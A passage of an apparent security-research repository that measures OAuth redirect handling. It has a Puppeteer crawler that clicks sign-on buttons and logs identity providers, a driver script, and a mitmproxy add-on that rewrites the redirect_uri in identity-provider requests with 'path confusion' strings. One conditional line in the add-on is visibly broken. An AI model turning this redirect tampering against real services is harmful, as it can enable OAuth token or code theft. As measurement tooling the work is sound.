211 | with open(gen_path+"/"+p+"-Target[temporary-snapshot].txt", 'a') as f:
212 | for s in range(len(Site_analyzed)):
213 | if s==len(Site_analyzed)-1:
214 | f.write(str(Site_analyzed[s])+"\n")
215 | else:
216 | f.write(str(Site_analyzed[s])+"\n")
217 | #wait 3hr between trance of sites
218 | #time.sleep(10800)
219 | time.sleep(30)
220 |
221 | #save site analyzed
222 | print("save site analyzed")
223 | with open(gen_path+"/"+p+"-Target.txt", 'a') as f:
224 | for s in range(len(Site_analyzed)):
225 | if s==len(Site_analyzed)-1:
226 | f.write(str(Site_analyzed[s])+"\n")
227 | else:
228 | f.write(str(Site_analyzed[s])+"\n")
229 | #remove snapshot of file if present
230 | if os.path.exists(gen_path+"/"+p+"-Target[temporary-snapshot].txt"):
231 | os.remove(gen_path+"/"+p+"-Target[temporary-snapshot].txt")
232 |
233 | #wait before next pathconfusion experiment
234 | print("wait between one path confusion and the other pathconfusion vector")
235 | time.sleep(30)
236 | #time.sleep(180)
237 |
--------------------------------------------------------------------------------
/verifysites.js:
--------------------------------------------------------------------------------
1 | const puppeteer = require('puppeteer');
2 | const FS = require('fs');
3 | const TLDJS = require('tldjs');
4 | const ArgParse = require('argparse');
5 |
6 | let WEBPAGE = null;
7 | let NameSITE = null;
8 | let TAG = null;
9 | let IDP = null;
10 | let IDP_Info = {};
11 | let XPathSSOElem=null;
12 | let newwindow=false;
13 | let measurement="";
14 |
15 | function parseArguments() {
16 | let parser = new ArgParse.ArgumentParser({
17 | add_help:true,
18 | description: 'Argparse example'
19 | });
20 |
21 | parser.add_argument(
22 | '--parameters',
23 | {
24 | action: 'store',
25 | required: true,
26 | help: 'parameters file'
27 | }
28 | );
29 |
30 | let args = parser.parse_args();
31 | PARAMETER= args.parameters;
32 | }
33 |
34 |
35 | async function Oauthurl(checkURL) {
36 | //search for oauth keyworks in url
37 | var identifiers=["redirect_uri","oauth"];
38 | var arrayLength = identifiers.length;
39 | for (var i = 0; i < arrayLength; i++) {
40 | let res = checkURL.search(identifiers[i])
41 | if(res >0){
42 | console.log("oauth keyword found in url");
43 | console.log(identifiers[i]);
44 | console.log(checkURL);
45 | return true;
46 | }
47 | }
48 | return false;
49 | }
50 |
51 | async function Save_textfile(name,content){
52 | //save file with HTML
53 | FS.writeFileSync(name,content);
54 | }
55 |
56 | (async() => {
57 | console.log("Step1 get info for the crawler");
58 | parseArguments();
59 | let rawdata = FS.readFileSync(PARAMETER);
60 | let params = JSON.parse(rawdata);
61 | WEBPAGE = params["WEBPAGE"];
62 | NameSITE = params["NameSITE"];
63 | XPathSSOElem = params["xpath"];
64 | OutputName = params["name"];
65 | OutputPath = params["outpath"];
66 | TAG=params["tag"];
67 | console.log("parameters received WEBPAGE: %s\nXPathSSOelem: %s\nOutputpath: %s\nOutputName: %s\nTAG: %s",WEBPAGE,XPathSSOElem,OutputPath,OutputName,TAG);
68 |
69 |
70 | //Step2: surf on the login page save initial page url then take a screenshot and then click in the SSO element
71 | console.log("Step2:start the login procedure")
72 | //start browser
73 | //'--proxy-server=http://127.0.0.1:7777',
74 | const browser = await puppeteer.launch({args:['--disable-gpu',
75 | '--no-sandbox',
76 | '--disable-popup-blocking',
77 | '--disable-notifications',
78 | '--password-store=basic',
79 | '--ignore-certificate-errors'],
80 | headless: false,
81 | executablePath: '/bin/google-chrome-stable'});
82 |
83 | const page = await browser.newPage();
84 |
85 | try{
86 | await page.goto(WEBPAGE, {waitUntil: 'load'});
87 | }catch(ex){
88 | console.log("error in surfing to the login page!ABORT-EXPERIMENT:YES");
89 | await browser.close();
90 | process.exit(101);
91 | }
92 |
93 | let initial_url=page.url();
94 | //initial_url=initial_url.split("#")[0];
95 |
96 | var domainbegin = TLDJS.parse(initial_url).domain;
97 | await page.waitForTimeout(5000);
98 |
99 | //take screenshot
100 | await page.screenshot({path: OutputPath+"/"+OutputName+"_Initial.png" ,fullPage: true});
101 |
102 | //evaluate XPath
103 | try{
104 | var SSO_Elem = await page.$x(XPathSSOElem);
105 | }catch(ex){
106 | if(ex.message.includes("Evaluation failed")){
107 | console.log("evaluation of xpath failed xpath syntactically wrong!");
108 | await browser.close();
109 | process.exit(106);
110 | /*
111 | console.log("wrong xpath use backup procedure as selector");
112 | try{
113 | await Promise.all([page.click(XPathSSOElem),
114 | page.waitForNavigation({timeout:5000, waitUntil: 'networkidle2'})]);
115 | }catch(error){
116 | console.log("error in the click as a selector");
117 | console.log("click as a selector not working wrong xpath? check if open a new tab");
118 | }
119 | */
120 | }
121 | }
122 |
123 | if(SSO_Elem.length>0){
124 | console.log("found SSO_Elem: %s",SSO_Elem);
125 | try{
126 | var SSO_Elem = await page.$x(XPathSSOElem);
127 | console.log("SSO_Elem: %s",SSO_Elem);
128 | console.log("use the SSO_Elem to click");
129 | await Promise.all([SSO_Elem[0].click(),
130 | page.waitForNavigation({timeout:5000, waitUntil: 'networkidle2'})]);
131 | }
132 | catch{
133 | console.log("click do not caused the redirect check if opened a new windows or stop");
134 | //means xpath not working or check new windows
135 |
136 | }
137 | }else {
138 | console.log("the xpath is not found stop here the experiment");
139 | await browser.close();
140 | //return code for
141 | process.exit(107);
142 |
143 | }
144 |
145 | //gives time to obtain any new tab opened
146 | await page.waitForTimeout(3000);
147 | var Open_Pages = await browser.pages();
148 | console.log("numbers of pages after click:%s",Open_Pages.length);
149 | await page.waitForTimeout(6000);
150 |
151 | //Step3: identify new open window and take a screenshot of initial tab page after SSO click
152 | console.log("step3:identify if open new window and check oauth param in redirect url");
153 |
154 | let opentabs = Open_Pages.length;
155 | console.log("numbers of pages after click:%s",Open_Pages.length);
156 | await Open_Pages[1].screenshot({path: OutputPath+"/"+OutputName+"_AfterSSOClick.png" ,fullPage: true});
157 |
158 | if(opentabs>2){//new window case
159 | //Step4: look at tabs and check the new windows if oauth params in url means right xpath so collect domain idp and close browser
160 | try{
161 | var tabindex_IDP=-1;
162 | for (var i = 0; i < Open_Pages.length; i++) {
163 | if(Open_Pages[i].url()!=initial_url && Open_Pages[i].url()!="about:blank"){
164 | //check url contains oauth keywords
165 | console.log("verify that new windows url has oauth keywords");
166 | url_newwindow=Open_Pages[i].url();
167 | let test1=await Oauthurl(url_newwindow);
168 | if(test1){
169 | idp_domain=TLDJS.parse(url_newwindow).domain;
170 | //obtain domain idp and save it to file
171 | //namesite;loginpage;xpathelement;idp_domain
172 | content=NameSITE+"@@@@"+WEBPAGE+"@@@@"+XPathSSOElem+"@@@@"+idp_domain+"@@@@"+TAG;
173 | Save_textfile(OutputPath+"/"+OutputName+"-updateinfo.txt",content);
174 | console.log("Click succesfully redirect to a link with oauth param");
175 | await browser.close();
176 | process.exit(104);
177 | }
178 | }
179 | }
180 |
181 | console.log("tab index after search:%s",tabindex_IDP);
182 | if (tabindex_IDP===-1){
183 | console.log("tab not found!!");
184 | console.log("Open a new tab but not with oauth check xpath! ABORT-EXPERIMENT:YES");
185 | await browser.close();
186 | process.exit(103);
187 | }
188 | }catch(ex){
189 | console.log("error in Step4 inspect test in:");
190 | testfailed=NameSITE+"@@@@"+WEBPAGE+"@@@@"+XPathSSOElem;
191 | console.log(testfailed)
192 | console.log(ex);
193 | await browser.close();
194 | process.exit(105);
195 |
196 | }
197 |
198 | }
199 | else {
200 | console.log("Step4alt: check url for presence of oauthparam");
201 | try{
202 | await page.waitForTimeout(3000);
203 | var check_url=page.url();
204 |
205 | if(check_url===initial_url){
206 | //verify differentiation between xpath not found and sso click not working
207 | console.log("no new window and same initial url Xpath SSO not working");
208 | console.log("unable to trigger IDP login ABORT-EXPERIMENT:YES");
209 | await browser.close();
210 | process.exit(102);
211 | }
212 | else{
213 | //Step4alt: no new window check url if conatins ouauth keyword and then obatin domain idp
214 | console.log("Step4alt: check url if contains oauthparam");
215 | await page.waitForTimeout(3000);
216 | var check_url=page.url();
217 | let test= await Oauthurl(check_url);
218 | if(test){
219 | idp_domain=TLDJS.parse(check_url).domain;
220 | //obtain domain idp and save it to file
221 | //WEBPAGE;loginpage;idp;domain
222 | content=NameSITE+"@@@@"+WEBPAGE+"@@@@"+XPathSSOElem+"@@@@"+idp_domain+"@@@@"+TAG;
223 | Save_textfile(OutputPath+"/"+OutputName+"-updateinfo.txt",content);
224 | console.log("Click succesful idp in url with oauth param");
225 | await browser.close();
226 | process.exit(104);
227 | }
228 | else{
229 | console.log("no oauthparam check correctness xpath sso element");
230 | await browser.close();
231 | process.exit(103);
232 | }
233 | }
234 | }catch(ex){
235 | console.log("error in Step4alt inspect test in:");
236 | testfailed=NameSITE+"@@@@"+WEBPAGE+"@@@@"+XPathSSOElem+"@@@@"+TAG;
237 | console.log(testfailed);
238 | console.log(ex);
239 | await browser.close();
240 | process.exit(105);
241 | }
242 | }
243 |
244 | })();
245 |
--------------------------------------------------------------------------------
/Start-SitesVerification.py:
--------------------------------------------------------------------------------
1 | import subprocess
2 | from subprocess import PIPE
3 | from subprocess import TimeoutExpired
4 | import urllib.parse
5 | import re,time,json,os,sys,copy
6 | import hashlib
7 |
8 |
9 | def Identify_SSO_idp(idp,SSO):
10 | sso=[]
11 | for i in SSO:
12 | if i["provider"]==idp:
13 | sso.append(i)
14 | return sso
15 |
16 | def GenResultFolder(folder):
17 | #Path output result
18 | if not os.path.exists(folder):
19 | os.makedirs(folder)
20 | else:
21 | print("directory alredy present do not override")
22 |
23 | def UpdateInfo(sites,newinfo,newsites):
24 | print(f'received this new info:{newinfo}')
25 | updatedsites=newsites.keys()
26 | info=newinfo.split("@@@@")
27 | temp={}
28 | print(f'infor after split: {info}')
29 | if(info[0] not in updatedsites):
30 | print(f'site to be updated: {info[0]}')
31 | for s in sites:
32 | if(s["site"]==info[0]):
33 | #
34 | temp=copy.deepcopy(s)
35 | break
36 | print(f'old site info:{temp}')
37 | tomodify={}
38 | #obtain SSO to be modified
39 | for l in temp["loginpages"]:
40 | if(l["loginpage"]==info[1]):
41 | for i in l["SSOs"]:
42 | try:
43 | if(i["tag"] == info[4]):
44 | tomodify=copy.deepcopy(i)
45 | except Exception as e:
46 | if(i["provider"] in info[3]):
47 | tomodify=copy.deepcopy(i)
48 |
49 | #update sso info
50 | tomodify["provider"]=info[3]
51 |
52 | #add to new sites info
53 | for l in temp["loginpages"]:
54 | if(l["loginpage"]==info[1]):
55 | print(f'len sso before:{len(l["SSOs"])}')
56 | idptempb=','.join(str(x["provider"]) for x in l["SSOs"])
57 | #print(f'before idps:{idptempb}')
58 | l["SSOs"]=[]
59 | l["SSOs"].append(tomodify)
60 | print(f'len sso after:{len(l["SSOs"])}')
61 | idptempa=','.join(str(x["provider"]) for x in l["SSOs"])
62 | print(f'after idps:{idptempa}')
63 |
64 | print(f'the new site info:{temp}')
65 | newsites[info[0]]=temp
66 | else:
67 | print(f'\nsite:{info[0]} already in the dictionary')
68 | save={}
69 | for s in sites:
70 | if(s["site"]==info[0]):
71 | save=copy.deepcopy(s)
72 | break
73 |
74 | print(f'get old site info:\n{save}\n \nNew info to be added to site:{newinfo}')
75 |
76 | #obtain SSO to be updated
77 | tomodify={}
78 | for l in save["loginpages"]:
79 | if(l["loginpage"]==info[1]):
80 | for i in l["SSOs"]:
81 | try:
82 | if(i["tag"] == info[4]):
83 | tomodify=copy.deepcopy(i)
84 | except Exception as e:
85 | if(i["provider"] in info[3]):
86 | tomodify=copy.deepcopy(i)
87 |
88 | #update info
89 | tomodify["provider"]=info[3]
90 |
91 | #add info to new site
92 | temp= newsites[info[0]]
93 | print(f'old site info:\n{temp}')
94 | print(f'new SSO:{tomodify}')
95 | for l in temp["loginpages"]:
96 | if(l["loginpage"]==info[1]):
97 | print(f'len sso before:{len(l["SSOs"])}')
98 | idptempb=','.join(str(x["provider"]) for x in l["SSOs"])
99 | print(f'before idps:{idptempb}')
100 | l["SSOs"].append(tomodify)
101 | print(f'len sso after:{len(l["SSOs"])}')
102 | idptempa=','.join(str(x["provider"]) for x in l["SSOs"])
103 | print(f'after idps:{idptempa}')
104 | print(f'the new site info:{temp}')
105 | newsites[info[0]]=temp
106 |
107 |
108 | if __name__ == "__main__":
109 | #input experiment: site and login pages
110 | #output experiment: file site verified for each logipage each idp xpath and
111 | sites = json.load(open(sys.argv[1],'r'))
112 | outputfolder=sys.argv[2]
113 |
114 |
115 | Site_analyzed=[]
116 | Nologinpage=[]
117 | NoSSOs=[]
118 | #key site and content site info
119 | updatedsites=dict()
120 | #site key and loginpage/idp value
121 | Missing_Xpath=dict()
122 | Wrong_SSOelement=dict()
123 | Syntactical_Wrong_Xpath=dict()
124 | CrawlerCrash=dict()
125 | NoActionElement=dict()
126 | EmptyResult=dict()
127 |
128 | #site key and list of loginpage as value
129 | Logingpage_unreachable=dict()
130 | start_time = time.time()
131 |
132 | GenResultFolder(outputfolder)
133 |
134 |
135 | for site in sites:
136 | if(not site['loginpages']):
137 | print(f'Site{site["site"]} without login pages')
138 | Nologinpage.append(site["site"])
139 | continue
140 |
141 | Site_analyzed.append(site["site"])
142 | for l in site['loginpages']:
143 | #no SSO move to next login page
144 | if(len(l["SSOs"])==0):
145 | NoSSOs.append(site["site"])
146 | continue
147 |
148 | Idp_sso=l["SSOs"]
149 | for s in Idp_sso:
150 | print(f'Test idp:{s["provider"]} on site: {site["site"]} loginpage:{l["loginpage"]}')
151 |
152 | try:
153 | if("//script" in s["xpath"]):
154 | continue
155 |
156 | pagehash=hashlib.md5((l["loginpage"]+s["xpath"]).encode('utf-8')).hexdigest()
157 | namefile=str(site['site'])+"-"+str(pagehash)
158 |
159 | except Exception as e:
160 |
161 | print("site with no xpath?")
162 | #key site and login page/idp
163 | if(site["site"] not in Missing_Xpath.keys()):
164 | Missing_Xpath[site["site"]]=[]
165 | Missing_Xpath[site["site"]].append(l["loginpage"]+";"+s["provider"])
166 |
167 | else:
168 | Missing_Xpath[site["site"]].append(l["loginpage"]+";"+s["provider"])
169 |
170 | continue
171 |
172 | #build parameter file for crawler
173 | paramfile="paramfile.json"
174 |
175 | paramters={
176 | "WEBPAGE":l["loginpage"],
177 | "NameSITE":site["site"],
178 | "xpath":s["xpath"],
179 | "name":namefile,
180 | "outpath":outputfolder,
181 | "tag":s["tag"]
182 | }
183 | print(f'parameters generated:{paramters}')
184 | time.sleep(2)
185 |
186 | with open(paramfile, 'w') as f:
187 | json.dump(paramters,f)
188 |
189 | #parameter file
190 | cmd=["node","verifysites.js"]
191 | cmd.append("--parameters="+paramfile)
192 |
193 | time.sleep(2)
194 | #start crawler
195 | Crawler_subproc = subprocess.Popen(cmd, stdout=subprocess.PIPE,universal_newlines=True)
196 | print("crawler started")
197 | time.sleep(3)
198 | #wait the crawler to terminate and get return code
199 | crawlresult=-1
200 | try:
201 | crawlresult=Crawler_subproc.wait(timeout=120)
202 | except TimeoutExpired:
203 | print("crawler blocked kill it and go ahead")
204 | crawlresult=Crawler_subproc.kill()
205 |
206 | print(f'print result Execution(return code subprocess) crawler:{crawlresult}')
207 |
208 | outs=Crawler_subproc.stdout
209 | buff=outs.read()
210 | print(f'output of crawler:{buff}')
211 |
212 | #save crawler output
213 | with open(namefile+"-crawlerlog.txt", 'w') as f:
214 | f.write(buff)
215 |
216 | time.sleep(2)
217 | print(f'before checking crawlresult:{crawlresult}')
218 | if(crawlresult==104):
219 | print("result of crawler succesfull")
220 | #update site info:
221 | with open(outputfolder+"/"+namefile+"-updateinfo.txt",'r') as f:
222 | newinfo=f.read()
223 | print(f'new info obtained by the crawler:{newinfo}')
224 |
225 | UpdateInfo(sites,newinfo,updatedsites)
226 |
227 | elif(crawlresult==102):
228 | print("xpath not producing any action discard element")
229 |
230 | if(site["site"] not in NoActionElement.keys()):
231 | NoActionElement[site["site"]]=[]
232 | NoActionElement[site["site"]].append(l["loginpage"]+";"+s["provider"])
233 | else:
234 | NoActionElement[site["site"]].append(l["loginpage"]+";"+s["provider"])
235 |
236 |
237 |
238 | elif(crawlresult==107):
239 | print("search xpath fail no element found wrong xpath")
240 | #EmptyResult
241 | if(site["site"] not in EmptyResult.keys()):
242 | EmptyResult[site["site"]]=[]
243 | EmptyResult[site["site"]].append(l["loginpage"]+";"+s["provider"])
244 | else:
245 | EmptyResult[site["site"]].append(l["loginpage"]+";"+s["provider"])
246 |
247 |
248 |
249 | elif(crawlresult==106):
250 | print("search xpath fail syntactically wrong xpath")
251 |
252 | if(site["site"] not in Syntactical_Wrong_Xpath.keys()):
253 | Syntactical_Wrong_Xpath[site["site"]]=[]
254 | Syntactical_Wrong_Xpath[site["site"]].append(l["loginpage"]+";"+s["provider"])
255 | else:
256 | Syntactical_Wrong_Xpath[site["site"]].append(l["loginpage"]+";"+s["provider"])
257 |
258 |
259 | elif(crawlresult==101):
260 | print(f'login page unreachable')
261 |
262 | if(site["site"] not in Logingpage_unreachable.keys()):
263 | Logingpage_unreachable[site["site"]]=[]
264 | Logingpage_unreachable[site["site"]].append(l["loginpage"]+";"+s["provider"])
265 | else:
266 | Logingpage_unreachable[site["site"]].append(l["loginpage"]+";"+s["provider"])
267 |
268 | elif(crawlresult==105):
269 | print("manually anlyze this site because of crawler error")
270 |
271 | if(site["site"] not in CrawlerCrash.keys()):
272 | CrawlerCrash[site["site"]]=[]
273 | CrawlerCrash[site["site"]].append(l["loginpage"]+";"+s["provider"])
274 | else:
275 | CrawlerCrash[site["site"]].append(l["loginpage"]+";"+s["provider"])
276 |
277 | elif(crawlresult==103):
278 | print("no oauth parameters in redirection link after click")
279 |
280 | if(site["site"] not in Wrong_SSOelement.keys()):
281 | Wrong_SSOelement[site["site"]]=[]
282 | Wrong_SSOelement[site["site"]].append(l["loginpage"]+";"+s["provider"])
283 | else:
284 | Wrong_SSOelement[site["site"]].append(l["loginpage"]+";"+s["provider"])
285 |
286 | #move file to experiment folder
287 | os.rename(namefile+"-crawlerlog.txt", outputfolder+"/"+namefile+"-crawlerlog.txt")
288 |
289 | print("browser ready for next measurement")
290 | time.sleep(2)
291 |
292 | #print new info site
293 | output_name=outputfolder+"/"+"Result-newinfo.json"
294 | File = open(output_name, "w+")
295 | File.write(json.dumps(updatedsites))
296 | File.close()
297 |
298 | with open(outputfolder+"/"+"Result-NoSSos.txt", 'w') as f:
299 | for s in range(len(NoSSOs)):
300 | f.write(str(NoSSOs[s])+"\n")
301 |
302 | with open(outputfolder+"/"+"Result-Nologinpage.txt", 'w') as f:
303 | for s in range(len(Nologinpage)):
304 | f.write(str(Nologinpage[s])+"\n")
305 |
306 | #print problem site
307 | output_name=outputfolder+"/"+"Result-Missing_Xpath.json"
308 | File = open(output_name, "w+")
309 | File.write(json.dumps(Missing_Xpath))
310 | File.close()
311 |
312 | #print problem site
313 | output_name=outputfolder+"/"+"Result-Wrong_SSOelement.json"
314 | File = open(output_name, "w+")
315 | File.write(json.dumps(Wrong_SSOelement))
316 | File.close()
317 |
318 | #print problem site
319 | output_name=outputfolder+"/"+"Result-Syntactical_Wrong_Xpath.json"
320 | File = open(output_name, "w+")
321 | File.write(json.dumps(Syntactical_Wrong_Xpath))
322 | File.close()
323 |
324 | #print crash crawler site
325 | output_name=outputfolder+"/"+"Result-CrawlerCrash.json"
326 | File = open(output_name, "w+")
327 | File.write(json.dumps(CrawlerCrash))
328 | File.close()
329 |
330 | #EmptyResult
331 | #print not oauth element
332 | output_name=outputfolder+"/"+"Result-EmptyResult.json"
333 | File = open(output_name, "w+")
334 | File.write(json.dumps(EmptyResult))
335 | File.close()
336 |
337 | #print not oauth element
338 | output_name=outputfolder+"/"+"Result-NoActionElement.json"
339 | File = open(output_name, "w+")
340 | File.write(json.dumps(NoActionElement))
341 | File.close()
342 |
343 | #print problem site
344 | output_name=outputfolder+"/"+"Result-Logingpage_unreachable.json"
345 | File = open(output_name, "w+")
346 | File.write(json.dumps(Logingpage_unreachable))
347 | File.close()
348 |
349 |
350 | save=list(updatedsites.values())
351 | print("save updated site analyzed")
352 | output_name="Verified_Sites.json"
353 | File = open(output_name, "w+")
354 | File.write(json.dumps(save))
355 | File.close()
356 |
357 | #extract top IdPs from file generated
358 | sites = json.load(open(output_name,'r'))
359 |
360 | Site_analyzed=[]
361 | IDP=dict()
362 |
363 | for site in sites:
364 | if(not site['loginpages']):
365 | continue
366 | for l in site['loginpages']:
367 | #no SSO move to next login page
368 | if(len(l["SSOs"])==0):continue
369 |
370 | for s in l["SSOs"]:
371 | if(s["provider"] not in IDP.keys()):
372 | IDP[s["provider"]]=[site["site"]]
373 | else:
374 | if(site["site"]not in IDP[s["provider"]]):
375 | IDP[s["provider"]].append(site["site"])
376 | else:
377 | continue
378 |
379 | arranged=sorted(IDP, key=lambda k: len(IDP[k]), reverse=True)
380 | for k in arranged:
381 | print(f'idp:{k}\n{IDP[k]}')
382 | with open("Top_Idps.json",'w') as f:
383 | for i in arranged:
384 | #only IdPs with more than 3 sites are considered
385 | if(len(IDP[i])>3):
386 | t={"idp":i,"sites":IDP[i]}
387 | json.dump(t,f)
388 |
389 |
--------------------------------------------------------------------------------
/tamper_http_header-path_conf.py:
--------------------------------------------------------------------------------
1 | from mitmproxy.net.http.http1.assemble import assemble_request
2 | import sys,typing,os
3 | import urllib.parse
4 | from urllib.parse import urlparse
5 | from mitmproxy import ctx
6 | from mitmproxy import exceptions
7 | from mitmproxy import types
8 |
9 | class PathConfString:
10 | Keywords=[]
11 | LinkPrefix=[]
12 |
13 | def load(self, loader):
14 | loader.add_option(
15 | name = "inject",
16 | typespec = str,
17 | default = "",
18 | help = "Provide the pathconfusion string",
19 | )
20 |
21 | loader.add_option(
22 | name = "linkprefix0",
23 | typespec = str,
24 | default = "",
25 | help = "link prefix where to inject the path confusion",
26 | )
27 |
28 | loader.add_option(
29 | name = "linkprefix1",
30 | typespec = str,
31 | default = "",
32 | help = "link prefix where to inject the path confusion",
33 | )
34 |
35 | loader.add_option(
36 | name = "counter",
37 | typespec = int,
38 | default = 1,
39 | help = "Define how many request modify",
40 | )
41 |
42 | loader.add_option(
43 | name = "keywords0",
44 | typespec = str,
45 | default = "",
46 | help = "keyword to identify network reqest to modify",
47 | )
48 |
49 | loader.add_option(
50 | name = "keywords1",
51 | typespec = str,
52 | default = "",
53 | help = "keyword to identify network reqest to modify",
54 | )
55 |
56 | loader.add_option(
57 | name = "keywords2",
58 | typespec = str,
59 | default = "",
60 | help = "keyword to identify network reqest to modify",
61 | )
62 |
63 | loader.add_option(
64 | name = "keywords3",
65 | typespec = str,
66 | default = "",
67 | help = "keyword to identify network reqest to modify",
68 | )
69 |
70 | loader.add_option(
71 | name = "keywords4",
72 | typespec = str,
73 | default = "",
74 | help = "keyword to identify network reqest to modify",
75 | )
76 |
77 | loader.add_option(
78 | name = "idphostname",
79 | typespec = str,
80 | default = "",
81 | help = "hostname of idp to be intercepted and modified",
82 | )
83 |
84 |
85 | def checkurlkeywords(self,flow):
86 | self.Keywords.append(ctx.options.keywords0)
87 | self.Keywords.append(ctx.options.keywords1)
88 | self.Keywords.append(ctx.options.keywords2)
89 | self.Keywords.append(ctx.options.keywords3)
90 | self.Keywords.append(ctx.options.keywords4)
91 |
92 | self.Keywords=list(filter(None, self.Keywords))
93 |
94 | for i in self.Keywords:
95 | if i not in flow.request.url:
96 | return False
97 |
98 | return True
99 |
100 | def checkurlprefix(self,flow):
101 | self.LinkPrefix.append(ctx.options.linkprefix0)
102 | self.LinkPrefix.append(ctx.options.linkprefix1)
103 |
104 | self.LinkPrefix=list(filter(None, self.LinkPrefix))
105 |
106 | found=False
107 | for i in self.LinkPrefix:
108 | if i in flow.request.url:
109 | found=True
110 |
111 | if found: return True
112 | return False
113 |
114 |
115 | def request(self,flow):
116 | print("inspecting request", file=sys.stdout)
117 | if ctx.options.counter<=0:return
118 |
119 | if flow.request.method.strip().upper() == 'GET':
120 | checkurl = urlparse(flow.request.url)
121 | #inspect only request with the IDP as domain
122 | if(ctx.options.idphostname in checkurl.hostname):
123 | print("request with idphostname", file=sys.stdout)
124 | #check request with the right prefix
125 | if not self.checkurlprefix(flow): return
126 |
127 | print(f'found link with rightprefix: {flow.request.url}',file=sys.stdout)
128 | #check request url with the right keywords
129 | if not self.checkurlkeywords(flow): return
130 |
131 | print("found a good candidate request to modify", file=sys.stdout)
132 |
133 | ctx.options.counter-=1
134 | if ctx.options.counter>=1:
135 | print("first request ignore it",file=sys.stdout)
136 | return
137 |
138 | multi_cmd=False
139 | if("+" in ctx.options.inject):multi_cmd=True
140 | #modify last w remove it or attach
141 | if("mdf" in ctx.options.inject and "lw" in ctx.options.inject):
142 | #modify last word of redirect uri
143 | b=flow.request.url.find("redirect_uri")
144 | f=flow.request.url.find("&",b)
145 | if(f>0):
146 | #find next param or end of string
147 | print(f'f greather than 0 so internal param', file=sys.stdout)
148 | ret=flow.request.url[b+13:f]
149 | else:
150 | ret=flow.request.url[b+13:]
151 | print(f'extracted redirect uri: {ret}', file=sys.stdout)
152 | #search / or %2f from end of redirect_uri
153 | cut=ret.rfind("/")
154 | if(cut<0):
155 | cut=ret.rfind('%2f')
156 | if(cut<0):
157 | cut=ret.rfind('%2F')
158 | if(cut<0):
159 | print("not able to find / or %2f or %2F",file=sys.stdout)
160 | return
161 | #modify word if larger than mod requested
162 | mod=4
163 | if(len(ret)-cut>mod):
164 | t=len(ret)-mod
165 | print(f'extracted string to capitalize: {ret[t:]}',file=sys.stdout)
166 | up=ret[t:].upper()
167 | print(f'upper string:{up}',file=sys.stdout)
168 | new=ret[:t]+up
169 | print(f'temp string modified with replace: {new}', file=sys.stdout)
170 | temp=flow.request.url
171 | bb=temp.replace(ret,new)
172 | flow.request.url=bb
173 | return
174 | else:
175 | print(f'world shorter: {len(ret)-cut} than mod requested {mod}',file=sys.stdout)
176 | return
177 | elif("rm" in ctx.options.inject and "lw" in ctx.options.inject):
178 | #modify last word of redirect uri
179 | b=flow.request.url.find("redirect_uri")
180 | f=flow.request.url.find("&",b)
181 | if(f>0):
182 | ret=flow.request.url[b+13:f]
183 | else:
184 | ret=flow.request.url[b+13:]
185 | #search / or %2f from end of redirect_uri
186 | cut=ret.rfind("/")
187 | if(cut<0):
188 | encut=ret.rfind('%2f')
189 | if(encut<0):
190 | encut=ret.rfind('%2F')
191 | if(encut<0):
192 | print("not able to find / or %2f",file=sys.stdout)
193 | return
194 | #remove last word
195 | print(f'ret string:{ret} len: {len(ret)}',file=sys.stdout)
196 | if(cut<0):
197 | print(f'found separator at position {encut} string from cut on {ret[encut:]} before cut {ret[:encut]}')
198 | else:
199 | print(f'found separator at position {cut} string from cut on {ret[cut:]} before cut {ret[:cut]}')
200 |
201 | if(cut<0):
202 | #means I found the encoded add 3 to keep / encoded
203 | new=ret[:encut]
204 | else:
205 | #normal char #add 1 to keep /
206 | new=ret[:cut]
207 |
208 | temp=flow.request.url
209 | bb=temp.replace(ret,new)
210 | flow.request.url=bb
211 | print(f'temp string modified with replace: {new}', file=sys.stdout)
212 | print(f'new temporary url: {flow.request.url}', file=sys.stdout)
213 |
214 | if(not multi_cmd):return
215 | else:second=ctx.options.inject.split("+")[1]
216 |
217 | print("at this point removed last word plus attach attack",file=sys.stdout)
218 | print("attach pathconfusion",file=sys.stdout)
219 |
220 | b=flow.request.url.find("redirect_uri")
221 | f=flow.request.url.find("&",b)
222 |
223 | if(f>0):
224 | #find next param or end of string
225 | print(f'f greather than 0 so internal param', file=sys.stdout)
226 | ret=flow.request.url[b+13:f]
227 | else:
228 | ret=flow.request.url[b+13:]
229 | print(f'extracted redirect uri: {ret}', file=sys.stdout)
230 |
231 | #try use lib to concatenate pathconfusion
232 | test1=urllib.parse.unquote(ret)
233 | print(f'test url unquoted: {test1}', file=sys.stdout)
234 | test=urlparse(test1)
235 | testpath=test.path
236 | print(f'test path extracted: {testpath}', file=sys.stdout)
237 | print(f'used second as inject string: {second}',file=sys.stdout)
238 | newpath=testpath+second
239 | print(f'new path generated: {newpath}', file=sys.stdout)
240 | newurl=test._replace(path=newpath).geturl()
241 | print(f'new url generated(unquoted): {newurl}', file=sys.stdout)
242 | quotedurl=urllib.parse.quote(newurl, safe='')
243 | print(f'new url generated(quoted): {quotedurl}', file=sys.stdout)
244 |
245 | temp=flow.request.url
246 | print(f'temp string: {temp}', file=sys.stdout)
247 | new=temp.replace(ret,quotedurl)
248 | print(f'temp string modified with replace: {new}', file=sys.stdout)
249 | flow.request.url=new
250 |
251 | else:
252 | print("only attach the pathconfusion string",file=sys.stdout)
253 |
254 | b=flow.request.url.find("redirect_uri")
255 | f=flow.request.url.find("&",b)
256 | g=flow.request.url.find('%3F',b)
257 |
258 | if(f0):
261 | #find next param or end of string
262 | print(f'f greather than 0 so internal param', file=sys.stdout)
263 | ret=flow.request.url[b+13:f]
264 | else:
265 | ret=flow.request.url[b+13:]
266 | else:
267 | print(f'in this case %3F is present and it is before & pos%3F:{g} pos&:{f}', file=sys.stdout)
268 | print(f'g greather than 0 so internal param', file=sys.stdout)
269 | ret=flow.request.url[b+13:g]
270 |
271 |
272 | print(f'extracted redirect uri: {ret}', file=sys.stdout)
273 | #try use lib to concatenate pathconfusion
274 | #test1=urllib.parse.unquote(ret)
275 | test1=ret
276 | print(f'test url unquoted: {test1}', file=sys.stdout)
277 | test=urlparse(test1)
278 | testpath=test.path
279 | print(f'test path extracted: {testpath}', file=sys.stdout)
280 | newpath=testpath+ctx.options.inject
281 | print(f'new path generated: {newpath}', file=sys.stdout)
282 | newurl=test._replace(path=newpath).geturl()
283 | print(f'new url generated used for injection(unquoted): {newurl}', file=sys.stdout)
284 | quotedurl=urllib.parse.quote(newurl, safe='')
285 | print(f'new url generated(quoted): {quotedurl}', file=sys.stdout)
286 |
287 | temp=flow.request.url
288 | print(f'temp string: {temp}', file=sys.stdout)
289 |
290 | new=temp.replace(ret,newurl)
291 | print(f'temp string modified with replace: {new}', file=sys.stdout)
292 | flow.request.url=new
293 |
294 |
